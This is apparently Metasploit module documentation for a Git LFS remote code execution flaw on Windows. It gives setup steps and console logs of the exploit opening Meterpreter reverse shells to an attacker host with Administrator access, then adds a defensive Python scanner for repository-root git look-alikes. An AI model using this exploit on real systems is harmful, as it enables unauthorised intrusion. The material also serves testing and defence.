## Vulnerable Application

Git in versions <= 2.29.2 includes the git-lfs extension, which allows remote attackers to execute arbitrary code on the victim's Windows system upon a clone operation. Attackers are able to plant a backdoor in the root directory of a malicious repository by simply adding an executable file named `git.exe`, or one using any other executable extension available on the target Windows system (dependent on the `PATHEXT` environment variable). As a result, when the repository is cloned, the malicious git binary is executed automatically instead of the original git binary located in a trusted path.

### Vulnerable Installation

1. Download a vulnerable version of Git for Windows: [v2.28.0](https://github.com/git-for-windows/git/releases/download/v2.28.0.windows.1/Git-2.28.0-64-bit.exe)
2. On the `Select Components` section of the installer, make sure Git LFS is selected (it should be by default).
3. You should now be able to run the exploit and get a session on Windows.

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/multi/http/git_lfs_rce`
4. Do: `run`
5. Ensure the exploit sets up a repository to be cloned, e.g. `http://192.168.123.1:8080/fixflex.git`
6. From the victim machine, clone the repository created by the exploit.
7. You should get a shell.

## Scenarios

### Git `v2.28.0` on Windows 10 (2004)

```
msf > use windows/http/git_lfs_rce
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf exploit(windows/http/git_lfs_rce) > set LHOST 172.16.199.1
LHOST => 172.16.199.1
msf exploit(windows/http/git_lfs_rce) > set RHOSTS 172.16.199.151
RHOSTS => 172.16.199.151
msf exploit(windows/http/git_lfs_rce) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.199.1:4444
msf exploit(windows/http/git_lfs_rce) >
[*] Using URL: http://0.0.0.0:8080/4C11tyW2NVX
[*] Local IP: http://192.168.2.114:8080/4C11tyW2NVX
[*] Server started.
[*] Git repository to clone: http://172.16.199.1:8080/cookley.git
[*] Sending payload data...
[*] Sending LFS object...
[*] Sending stage (200262 bytes) to 172.16.199.151
[+] Deleted .gitattributes
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.151:50018) at 2021-09-07 12:05:55 -0400

msf exploit(windows/http/git_lfs_rce) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: DESKTOP-13BFU78\Administrator
meterpreter > sysinfo
Computer        : DESKTOP-13BFU78
OS              : Windows 10 (10.0 Build 19041).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter >
```

### Git `v2.32.0` on Windows 10 20H2

```
msf > use windows/http/git_lfs_rce
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf exploit(windows/http/git_lfs_rce) > set LHOST 192.168.123.1
LHOST => 192.168.123.1
msf exploit(windows/http/git_lfs_rce) > set RHOSTS 192.168.123.150
RHOSTS => 172.16.199.151
msf exploit(windows/http/git_lfs_rce) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.123.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable.
msf exploit(windows/http/git_lfs_rce) >
[*] Using URL: http://0.0.0.0:8080/15VCXHvHTOq5O
[*] Local IP: http://192.168.2.114:8080/15VCXHvHTOq5O
[*] Server started.
[*] Git repository to clone: http://192.168.123.1:8080/fixflex.git
[-] Exception handling request: The git client needs to be running on windows with a version less than 2.29.2. The client found was running on: Windows and was version: 2.32.0
```
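A defender-side check for the lookup behaviour described under Vulnerable Application, added here as example code (it is not part of the Metasploit module): it flags files in a cloned repository's root whose name would resolve as `git` under `PATHEXT`, and parses `git --version` output against the "less than 2.29.2" threshold the module's check message uses. The directory listing, the default `PATHEXT` value and the function names are constructed for this example.

```python
"""Detection helper for repositories that ship a `git` look-alike in their root.

On Windows, an executable is looked up by bare name plus each PATHEXT
extension; a repo-root `git.exe` (or `git.bat`, ...) therefore shadows the
trusted git binary when the working directory is searched first.
"""
import os
import re

# Constructed default; the real value comes from the PATHEXT environment variable.
DEFAULT_PATHEXT = ".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC"
FIXED_VERSION = (2, 29, 2)  # threshold quoted in the module's check message


def shadowing_candidates(filenames, pathext=DEFAULT_PATHEXT):
    """Return entries whose stem is `git` and whose extension is in PATHEXT.

    Windows file names are case-insensitive, so `Git.EXE` is reported too;
    `git.txt` or `gitk` are not, since they never resolve as `git`.
    """
    exts = {e.lower() for e in pathext.split(";") if e}
    hits = []
    for name in filenames:
        stem, ext = os.path.splitext(name)
        if stem.lower() == "git" and ext.lower() in exts:
            hits.append(name)
    return sorted(hits)


def is_affected_version(version_output):
    """True if `git --version` output reports a release below 2.29.2."""
    m = re.search(r"git version (\d+)\.(\d+)\.(\d+)", version_output)
    if not m:
        return False  # unparsable output: do not claim it is affected
    return tuple(int(x) for x in m.groups()) < FIXED_VERSION


def scan_repo_root(path):
    """Scan the root of a checked-out repository using the live PATHEXT."""
    pathext = os.environ.get("PATHEXT", DEFAULT_PATHEXT)
    return shadowing_candidates(os.listdir(path), pathext)


if __name__ == "__main__":
    # Constructed listing of a suspicious repository root.
    listing = ["README.md", ".gitattributes", "Git.exe", "git.bat", "git.txt", "gitk"]
    print(shadowing_candidates(listing))  # ['Git.exe', 'git.bat']
    print(is_affected_version("git version 2.28.0.windows.1"))  # True
    print(is_affected_version("git version 2.32.0.windows.1"))  # False
```

Run `scan_repo_root(".")` inside a freshly cloned repository before invoking any git command in it; a non-empty result is the indicator to act on.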